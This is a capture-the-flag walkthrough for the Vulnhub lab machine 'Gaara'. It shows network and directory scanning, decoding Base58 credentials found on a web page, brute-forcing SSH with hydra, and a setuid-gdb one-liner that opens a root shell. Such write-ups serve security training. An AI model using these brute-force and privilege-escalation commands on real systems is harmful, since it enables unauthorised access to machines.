Gaara by 0xJin is an easy machine from Vulnhub, although it has some rabbit holes along the way. I tested this machine on VirtualBox.
Link to the machine: https://www.vulnhub.com/entry/gaara-1,629/
Identify the target
As usual, we have to identify the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24
Scan open ports
Next, we have to scan the open ports on the target machine.
nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.62
This is a simple machine that has HTTP and SSH services available.
Enumerate the web server
The default page had an image and nothing more.
Thus, we have to try bruteforcing the directories.
gobuster dir -u http://10.0.2.62 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir.log
There is an interesting path that we need to check.
There are three paths to check again. So, I looked at them one by one. All of them contained long texts. Hence, I decided to get unique words from them.
curl http://10.0.2.62/iamGaara | grep -oE '\w+' | sort -u -f | more
The path /iamGaara gave me an encoded text that I could decode using CyberChef. The text contains lowercase letters and the digits 1 and 9, while Base32 uses only uppercase letters and the digits 2 to 7, so this is not Base32. Testing for Base58 gave me credentials.
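The alphabet check described above, generalized to a few common encodings, as an added example that is not part of the original writeup. The sample string is constructed (the Base58 form of "hello world", not the text from the target), and the Bitcoin Base58 alphabet is assumed.

```python
import re

# Bitcoin Base58 alphabet (assumed here): no 0, O, I or l
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# name -> (pattern the whole string must match, required length multiple)
RULES = {
    "hex":    (r"[0-9A-Fa-f]+", 2),
    "base32": (r"[A-Z2-7]+=*", 8),            # RFC 4648: uppercase and 2-7 only
    "base58": (r"[1-9A-HJ-NP-Za-km-z]+", 1),
    "base64": (r"[A-Za-z0-9+/]+={0,2}", 4),   # padded form
}


def candidates(text):
    """Return the encodings whose alphabet and length rules the text satisfies."""
    return [name for name, (pattern, multiple) in RULES.items()
            if re.fullmatch(pattern, text) and len(text) % multiple == 0]


def b58decode(text):
    """Decode Base58; each leading '1' stands for one leading zero byte."""
    n = 0
    for ch in text:
        n = n * 58 + B58.index(ch)  # ValueError on a character outside the alphabet
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * zeros + body


# Constructed sample, not the string from the target machine
SAMPLE = "StV1DL6CwTryKyV"

if __name__ == "__main__":
    found = candidates(SAMPLE)
    print("candidates:", found)
    if "base58" in found:
        print("decoded:", b58decode(SAMPLE))
```

A string such as "deadbeef" passes several of these checks at once, so the alphabet test only narrows the list; the decoded output still has to be readable to confirm the guess.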
However, this didn’t work on the SSH server. Still, we have a username whose password we can bruteforce.
hydra -l gaara -P /home/kali/rockyou.txt 10.0.2.62 ssh
Finally, I got a password. Then I got shell access as the user.
ssh gaara@10.0.2.62
Root privilege escalation
In the directory, there is a file Kazekage.txt that contains a path. This is a rabbit hole, but let’s see.
In that directory, there is a secret file.
There is a brainf*ck encoded text that reads the following.
Next, I checked the SUID binaries on the system.
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
The binary gdb had setuid permissions. Hence, we can do privilege escalation from here.
Reference: https://gtfobins.github.io/gtfobins/gdb/#suid
gdb -nx -ex 'python import os; os.execl("/bin/bash", "bash", "-p")' -ex quit
Finally, we got the bash shell with root access. Next, we have the root flag.